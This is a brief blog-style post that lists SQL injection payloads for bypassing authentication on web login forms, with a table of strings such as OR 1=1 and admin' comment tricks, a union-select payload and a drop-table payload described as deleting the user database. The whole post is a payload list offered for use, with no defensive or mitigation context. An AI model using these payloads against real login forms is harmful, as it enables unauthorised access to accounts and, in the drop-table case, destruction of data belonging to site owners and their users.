» Generic – Bypass Authentication
The following payloads are generally applied to login forms with a username and password. Correctly performing these attacks will allow you to authenticate to the web application (unless otherwise stated).
| Payload | Description (if any) |
| realusername' OR 1=1– | Authenticate as a real user without requiring a password. |
| 'OR '' = ' | Allows authentication without a valid username. |
| admin'– | Authenticate as user admin without a password. |
| ' union select 1, 'user', 'pass' 1– | Requires knowledge of column names. |
| '; drop table users– | DANGEROUS! this will delete the user database if the table name is 'users'. |
No Response to "Generic – Bypass Authentication"
Post a Comment